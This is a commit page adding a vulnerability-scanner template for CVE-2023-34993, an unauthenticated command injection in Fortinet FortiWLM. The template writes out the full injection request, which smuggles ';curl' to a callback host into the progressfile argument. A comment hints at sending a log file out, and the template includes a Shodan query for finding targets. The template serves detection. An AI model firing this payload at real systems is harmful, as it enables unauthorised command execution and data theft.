Merge pull request #9348 from dwisiswant0/dwisiswant0/feat/add-cve-2023-34993

feat(http): add CVE-2023-34993
2024-03-30 09:17:43 +05:30 · 2024-03-30 09:17:43 +05:30 · 2b39ba8535
parent 2af9ff394b 8e29306c16
commit 2b39ba8535
1 changed files with 42 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-34993.yaml
+++ b/http/cves/2023/CVE-2023-34993.yaml
@ -0,0 +1,42 @@
+id: CVE-2023-34993
+
+info:
+  name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
+  author: dwisiswant0
+  severity: critical
+  description: |
+    A improper neutralization of special elements used in an os command ('os
+    command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
+    8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
+    Successful exploitation of this vulnerability could allow an attacker to
+    bypass authentication and gain unauthorized access to the affected system.
+  remediation: |
+    For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
+    For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
+  reference:
+    - https://fortiguard.com/psirt/FG-IR-23-140
+    - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
+  metadata:
+    max-request: 1
+    vendor: fortinet
+    product: fortiwlm
+    shodan-query: http.title:"FortiWLM"
+  tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
+
+variables:
+  progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"